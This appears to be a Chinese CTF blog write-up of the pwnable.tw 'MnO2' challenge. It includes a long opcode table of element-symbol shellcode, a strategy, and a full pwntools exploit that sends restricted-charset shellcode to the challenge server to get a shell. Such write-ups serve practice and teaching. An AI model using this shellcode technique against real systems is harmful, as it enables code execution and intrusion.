    p.send(p64(system))
    
    p.interactive()

if __name__ == "__main__":
    exp()

[pwnable.tw] MnO2 指定字符组合shellcode构造

作者: eqqie
时间: 2020-12-03
分类: pwnable.tw
评论

题目分析

究极丧心病狂的题，只能使用元素周期表组合以及数字填充进行shellcode构造。顺带一提，题目名字二氧化锰的来由是写入shellcode的固定地址转ascii转译后的结果。

可用指令分析：

H
   0:   48                      dec    eax
He
   0:   48                      dec    eax
   1:   65                      gs
Li
   0:   4c                      dec    esp
   1:   69                      .byte 0x69
Be
   0:   42                      inc    edx
   1:   65                      gs
B
   0:   42                      inc    edx
C
   0:   43                      inc    ebx
N
   0:   4e                      dec    esi
O
   0:   4f                      dec    edi
F
   0:   46                      inc    esi
Ne
   0:   4e                      dec    esi
   1:   65                      gs
Na
   0:   4e                      dec    esi
   1:   61                      popa
Mg
   0:   4d                      dec    ebp
   1:   67                      addr16
Al
   0:   41                      inc    ecx
   1:   6c                      ins    BYTE PTR es:[edi],dx
Si
   0:   53                      push   ebx
   1:   69                      .byte 0x69
P
   0:   50                      push   eax
S
   0:   53                      push   ebx
Cl
   0:   43                      inc    ebx
   1:   6c                      ins    BYTE PTR es:[edi],dx
Ar
   0:   41                      inc    ecx
   1:   72                      .byte 0x72
K
   0:   4b                      dec    ebx
Ca
   0:   43                      inc    ebx
   1:   61                      popa
Sc
   0:   53                      push   ebx
   1:   63                      .byte 0x63
Ti
   0:   54                      push   esp
   1:   69                      .byte 0x69
V
   0:   56                      push   esi
Cr
   0:   43                      inc    ebx
   1:   72                      .byte 0x72
Mn
   0:   4d                      dec    ebp
   1:   6e                      outs   dx,BYTE PTR ds:[esi]
Fe
   0:   46                      inc    esi
   1:   65                      gs
Co
   0:   43                      inc    ebx
   1:   6f                      outs   dx,DWORD PTR ds:[esi]
Ni
   0:   4e                      dec    esi
   1:   69                      .byte 0x69
Cu
   0:   43                      inc    ebx
   1:   75                      .byte 0x75
Zn
   0:   5a                      pop    edx
   1:   6e                      outs   dx,BYTE PTR ds:[esi]
Ga
   0:   47                      inc    edi
   1:   61                      popa
Ge
   0:   47                      inc    edi
   1:   65                      gs
As
   0:   41                      inc    ecx
   1:   73                      .byte 0x73
Se
   0:   53                      push   ebx
   1:   65                      gs
Br
   0:   42                      inc    edx
   1:   72                      .byte 0x72
Kr
   0:   4b                      dec    ebx
   1:   72                      .byte 0x72
Rb
   0:   52                      push   edx
   1:   62                      .byte 0x62
Sr
   0:   53                      push   ebx
   1:   72                      .byte 0x72
Y
   0:   59                      pop    ecx
Zr
   0:   5a                      pop    edx
   1:   72                      .byte 0x72
Nb
   0:   4e                      dec    esi
   1:   62                      .byte 0x62
Mo
   0:   4d                      dec    ebp
   1:   6f                      outs   dx,DWORD PTR ds:[esi]
Tc
   0:   54                      push   esp
   1:   63                      .byte 0x63
Ru
   0:   52                      push   edx
   1:   75                      .byte 0x75
Rh
   0:   52                      push   edx
   1:   68                      .byte 0x68
Pd
   0:   50                      push   eax
   1:   64                      fs
Ag
   0:   41                      inc    ecx
   1:   67                      addr16
Cd
   0:   43                      inc    ebx
   1:   64                      fs
In
   0:   49                      dec    ecx
   1:   6e                      outs   dx,BYTE PTR ds:[esi]
Sn
   0:   53                      push   ebx
   1:   6e                      outs   dx,BYTE PTR ds:[esi]
Sb
   0:   53                      push   ebx
   1:   62                      .byte 0x62
Te
   0:   54                      push   esp
   1:   65                      gs
I
   0:   49                      dec    ecx
Xe
   0:   58                      pop    eax
   1:   65                      gs
Cs
   0:   43                      inc    ebx
   1:   73                      .byte 0x73
Ba
   0:   42                      inc    edx
   1:   61                      popa
La
   0:   4c                      dec    esp
   1:   61                      popa
Ce
   0:   43                      inc    ebx
   1:   65                      gs
Pr
   0:   50                      push   eax
   1:   72                      .byte 0x72
Nd
   0:   4e                      dec    esi
   1:   64                      fs
Pm
   0:   50                      push   eax
   1:   6d                      ins    DWORD PTR es:[edi],dx
Sm
   0:   53                      push   ebx
   1:   6d                      ins    DWORD PTR es:[edi],dx
Eu
   0:   45                      inc    ebp
   1:   75                      .byte 0x75
Gd
   0:   47                      inc    edi
   1:   64                      fs
Tb
   0:   54                      push   esp
   1:   62                      .byte 0x62
Dy
   0:   44                      inc    esp
   1:   79                      .byte 0x79
Ho
   0:   48                      dec    eax
   1:   6f                      outs   dx,DWORD PTR ds:[esi]
Er
   0:   45                      inc    ebp
   1:   72                      .byte 0x72
Tm
   0:   54                      push   esp
   1:   6d                      ins    DWORD PTR es:[edi],dx
Yb
   0:   59                      pop    ecx
   1:   62                      .byte 0x62
Lu
   0:   4c                      dec    esp
   1:   75                      .byte 0x75
Hf
   0:   48                      dec    eax
   1:   66                      data16
Ta
   0:   54                      push   esp
   1:   61                      popa
W
   0:   57                      push   edi
Re
   0:   52                      push   edx
   1:   65                      gs
Os
   0:   4f                      dec    edi
   1:   73                      .byte 0x73
Ir
   0:   49                      dec    ecx
   1:   72                      .byte 0x72
Pt
   0:   50                      push   eax
   1:   74                      .byte 0x74
Au
   0:   41                      inc    ecx
   1:   75                      .byte 0x75
Hg
   0:   48                      dec    eax
   1:   67                      addr16
Tl
   0:   54                      push   esp
   1:   6c                      ins    BYTE PTR es:[edi],dx
Pb
   0:   50                      push   eax
   1:   62                      .byte 0x62
Bi
   0:   42                      inc    edx
   1:   69                      .byte 0x69
Po
   0:   50                      push   eax
   1:   6f                      outs   dx,DWORD PTR ds:[esi]
At
   0:   41                      inc    ecx
   1:   74                      .byte 0x74
Rn
   0:   52                      push   edx
   1:   6e                      outs   dx,BYTE PTR ds:[esi]
Fr
   0:   46                      inc    esi
   1:   72                      .byte 0x72
Ra
   0:   52                      push   edx
   1:   61                      popa
Ac
   0:   41                      inc    ecx
   1:   63                      .byte 0x63
Th
   0:   54                      push   esp  
   1:   68                      .byte 0x68  //free push
Pa
   0:   50                      push   eax
   1:   61                      popa
U
   0:   55                      push   ebp
Np
   0:   4e                      dec    esi
   1:   70                      .byte 0x70
Pu
   0:   50                      push   eax
   1:   75                      .byte 0x75
Am
   0:   41                      inc    ecx
   1:   6d                      ins    DWORD PTR es:[edi],dx
Cm
   0:   43                      inc    ebx
   1:   6d                      ins    DWORD PTR es:[edi],dx
Bk
   0:   42                      inc    edx
   1:   6b                      .byte 0x6b
Cf
   0:   43                      inc    ebx
   1:   66                      data16
Es
   0:   45                      inc    ebp
   1:   73                      .byte 0x73
Fm
   0:   46                      inc    esi
   1:   6d                      ins    DWORD PTR es:[edi],dx
Md
   0:   4d                      dec    ebp
   1:   64                      fs
No
   0:   4e                      dec    esi
   1:   6f                      outs   dx,DWORD PTR ds:[esi]
Lr
   0:   4c                      dec    esp
   1:   72                      .byte 0x72
Rf
   0:   52                      push   edx
   1:   66                      data16
Db
   0:   44                      inc    esp
   1:   62                      .byte 0x62
Sg
   0:   53                      push   ebx
   1:   67                      addr16
Bh
   0:   42                      inc    edx
   1:   68                      .byte 0x68
Hs
   0:   48                      dec    eax
   1:   73                      .byte 0x73
Mt
   0:   4d                      dec    ebp
   1:   74                      .byte 0x74
Ds
   0:   44                      inc    esp
   1:   73                      .byte 0x73
Rg
   0:   52                      push   edx
   1:   67                      addr16
Cn
   0:   43                      inc    ebx
   1:   6e                      outs   dx,BYTE PTR ds:[esi]
Fl
   0:   46                      inc    esi
   1:   6c                      ins    BYTE PTR es:[edi],dx
Lv
   0:   4c                      dec    esp
   1:   76                      .byte 0x76
11
   0:   31 31                   xor    DWORD PTR [ecx],esi
12
   0:   31 32                   xor    DWORD PTR [edx],esi
13
   0:   31 33                   xor    DWORD PTR [ebx],esi
14
   0:   31                      .byte 0x31
   1:   34                      .byte 0x34
15
   0:   31                      .byte 0x31
   1:   35                      .byte 0x35
16
   0:   31 36                   xor    DWORD PTR [esi],esi
17
   0:   31 37                   xor    DWORD PTR [edi],esi
18
   0:   31 38                   xor    DWORD PTR [eax],edi
19
   0:   31 39                   xor    DWORD PTR [ecx],edi
10
   0:   31 30                   xor    DWORD PTR [eax],esi
21
   0:   32 31                   xor    dh,BYTE PTR [ecx]
22
   0:   32 32                   xor    dh,BYTE PTR [edx]
23
   0:   32 33                   xor    dh,BYTE PTR [ebx]
24
   0:   32                      .byte 0x32
   1:   34                      .byte 0x34
25
   0:   32                      .byte 0x32
   1:   35                      .byte 0x35
   0:   32 36                   xor    dh,BYTE PTR [esi]
27
   0:   32 37                   xor    dh,BYTE PTR [edi]
28
   0:   32 38                   xor    bh,BYTE PTR [eax]
29
   0:   32 39                   xor    bh,BYTE PTR [ecx]
20
   0:   32 30                   xor    dh,BYTE PTR [eax]
31
   0:   33 31                   xor    esi,DWORD PTR [ecx]
32
   0:   33 32                   xor    esi,DWORD PTR [edx]
33
   0:   33 33                   xor    esi,DWORD PTR [ebx]
34
   0:   33                      .byte 0x33
   1:   34                      .byte 0x34
35
   0:   33                      .byte 0x33
   1:   35                      .byte 0x35
36
   0:   33 36                   xor    esi,DWORD PTR [esi]
37
   0:   33 37                   xor    esi,DWORD PTR [edi]
38
   0:   33 38                   xor    edi,DWORD PTR [eax]
39
   0:   33 39                   xor    edi,DWORD PTR [ecx]
30
   0:   33 30                   xor    esi,DWORD PTR [eax]
41
   0:   34 31                   xor    al,0x31
42
   0:   34 32                   xor    al,0x32
43
   0:   34 33                   xor    al,0x33
44
   0:   34 34                   xor    al,0x34
45
   0:   34 35                   xor    al,0x35
46
   0:   34 36                   xor    al,0x36
47
   0:   34 37                   xor    al,0x37
48
   0:   34 38                   xor    al,0x38
49
   0:   34 39                   xor    al,0x39
40
   0:   34 30                   xor    al,0x30
51
   0:   35                      .byte 0x35
   1:   31                      .byte 0x31
52
   0:   35                      .byte 0x35
   1:   32                      .byte 0x32
53
   0:   35                      .byte 0x35
   1:   33                      .byte 0x33
54
   0:   35                      .byte 0x35
   1:   34                      .byte 0x34
55
   0:   35                      .byte 0x35
   1:   35                      .byte 0x35
56
   0:   35                      .byte 0x35
   1:   36                      ss
57
   0:   35                      .byte 0x35
   1:   37                      aaa
58
   0:   35                      .byte 0x35
   1:   38                      .byte 0x38
59
   0:   35                      .byte 0x35
   1:   39                      .byte 0x39
50
   0:   35                      .byte 0x35
   1:   30                      .byte 0x30
61
   0:   36                      ss
   1:   31                      .byte 0x31
62
   0:   36                      ss
   1:   32                      .byte 0x32
63
   0:   36                      ss
   1:   33                      .byte 0x33
64
   0:   36                      ss
   1:   34                      .byte 0x34
65
   0:   36                      ss
   1:   35                      .byte 0x35
66
   0:   36                      ss
   1:   36                      ss
67
   0:   36 37                   ss aaa
68
   0:   36                      ss
   1:   38                      .byte 0x38
69
   0:   36                      ss
   1:   39                      .byte 0x39
60
   0:   36                      ss
   1:   30                      .byte 0x30
71
   0:   37                      aaa    
   1:   31                      .byte 0x31
72
   0:   37                      aaa    
   1:   32                      .byte 0x32
73
   0:   37                      aaa    
   1:   33                      .byte 0x33
74
   0:   37                      aaa    
   1:   34                      .byte 0x34
75
   0:   37                      aaa    
   1:   35                      .byte 0x35
76
   0:   37                      aaa    
   1:   36                      ss
77
   0:   37                      aaa    
   1:   37                      aaa
78
   0:   37                      aaa    
   1:   38                      .byte 0x38
79
   0:   37                      aaa    
   1:   39                      .byte 0x39
70
   0:   37                      aaa    
   1:   30                      .byte 0x30
81
   0:   38 31                   cmp    BYTE PTR [ecx],dh
82
   0:   38 32                   cmp    BYTE PTR [edx],dh
83
   0:   38 33                   cmp    BYTE PTR [ebx],dh
84
   0:   38                      .byte 0x38
   1:   34                      .byte 0x34
85
   0:   38                      .byte 0x38
   1:   35                      .byte 0x35
86
   0:   38 36                   cmp    BYTE PTR [esi],dh
87
   0:   38 37                   cmp    BYTE PTR [edi],dh
88
   0:   38 38                   cmp    BYTE PTR [eax],bh
89
   0:   38 39                   cmp    BYTE PTR [ecx],bh
80
   0:   38 30                   cmp    BYTE PTR [eax],dh
91
   0:   39 31                   cmp    DWORD PTR [ecx],esi
92
   0:   39 32                   cmp    DWORD PTR [edx],esi
93
   0:   39 33                   cmp    DWORD PTR [ebx],esi
94
   0:   39                      .byte 0x39
   1:   34                      .byte 0x34
95
   0:   39                      .byte 0x39
   1:   35                      .byte 0x35
96
   0:   39 36                   cmp    DWORD PTR [esi],esi
97
   0:   39 37                   cmp    DWORD PTR [edi],esi
98
   0:   39 38                   cmp    DWORD PTR [eax],edi
99
   0:   39 39                   cmp    DWORD PTR [ecx],edi
90
   0:   39 30                   cmp    DWORD PTR [eax],esi
01
   0:   30 31                   xor    BYTE PTR [ecx],dh
02
   0:   30 32                   xor    BYTE PTR [edx],dh
03
   0:   30 33                   xor    BYTE PTR [ebx],dh
04
   0:   30                      .byte 0x30
   1:   34                      .byte 0x34
05
   0:   30                      .byte 0x30
   1:   35                      .byte 0x35
06
   0:   30 36                   xor    BYTE PTR [esi],dh
07
   0:   30 37                   xor    BYTE PTR [edi],dh
08
   0:   30 38                   xor    BYTE PTR [eax],bh
09
   0:   30 39                   xor    BYTE PTR [ecx],bh
00
   0:   30 30                   xor    BYTE PTR [eax],dh

主要思路：

把eax赋值为esp，然后向栈中写入esi/edi的值，以便借助异或清空esi/edi
借助Thxxxx这样的push语句和可以pop ecx的语句将ecx指向末位用于制造int 0x80的位置
移动ecx的指针，同时修改esi/edi，借助异或语句制造出int 0x80（至于用什么值异或可以另外写个脚本fuzz以下，可选的对象还是挺多的）
esi值得改变通过inc/dec完成，可能会占掉很长一段，需要合理安排
调用到SYS_read之后向最末尾读入可以直接getshell的shellcode（需要提前安排好ecx的位置）

EXP：

from pwn import *

#p = process("./mno2")
p = remote('chall.pwnable.tw','10301')
elf = ELF("./mno2")

context.log_level = "debug"

'''
reg status:
 EAX  0x324f6e4d ◂— dec    eax /* 0x484848; 'HHH' */ shellcode start
 EBX  0x0
 ECX  0x0
 EDX  0x8048890 ◂— dec    eax /* 'H' */
 EDI  0xf7fa8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
 ESI  0xf7fa8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
 EBP  0xffffcf18 ◂— 0x0
 ESP  0xffffcedc —▸ 0x80487ea (main+169) ◂— mov    dword ptr [esp], 0
 EIP  0x324f6e4d ◂— dec    eax /* 0x484848; 'HHH' */
'''

'''
target status1:
eax = 11
ebx -> '/bin/sh' 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
ecx = 0
edx = 0
int 0x80 b'\xcd\x80'
'''
'''
target status2:
eax = 3
ebx =0
ecx = addr(end_of_shellcode)
edx = (big num)
int 0x80 b'\xcd\x80'
'''

shellcode = b"V"   #push esi;
shellcode += b"Th1111"  #push esp; push 0x33333333;
shellcode += b"XeXe"    #pop eax;#pop eax;
shellcode += b"ThMoO2"  #push esp; push 0x324f6e4d(shellcode start)
shellcode += b"30"  #xor esi,DWORD PTR [eax];
shellcode += b"38"  #xor edi,DWORD PTR [eax];
shellcode += b"Y"   #pop ecx;
shellcode += b"O"   #dec edi;
shellcode += b"19"  #xor    DWORD PTR [ecx],edi
shellcode += b"Ag"*1  #inc ecx;addr16;
shellcode += b"F"*0x46  #inc esi;
shellcode += b"11"  #xor    DWORD PTR [ecx],esi
shellcode += b"Ag"*1  #inc ecx;addr16; new shellcode start
shellcode += b"V"   #push esi;
shellcode += b"Xe"  #pop eax;
shellcode += b"Th1111"  #pad;
shellcode += b"Hg"*0x43  #dec eax;
shellcode += b"B"*(0x100-len(shellcode))
shellcode += b"29"


def exp():
    #gdb.attach(p, "b *0x80487E8\nc\n")
    p.sendline(shellcode)
    p.sendline(asm(shellcraft.sh()))
    p.interactive()

if __name__ == "__main__":
   exp()

分类 writeups 下的文章

[pwnable.tw] unexploitable - 利用微偏移在read库函数中找syscall gadget

分析

思路

EXP

[pwnable.tw] De-ASLR - "call reg"式ROP链+栈残留指针运用

分析

思路

EXP

[pwnable.tw] Break Out - realloc特性利用

一些怨言

EXP：

[starCTF / *CTF 2021] Pwn方向writeup

babyheap

babypac

Favourite Architecure flag1

Favourite Architecure flag2

[pwnable.tw] MnO2 指定字符组合shellcode构造

题目分析

可用指令分析：

主要思路：

EXP：

最新文章

分类

归档

其它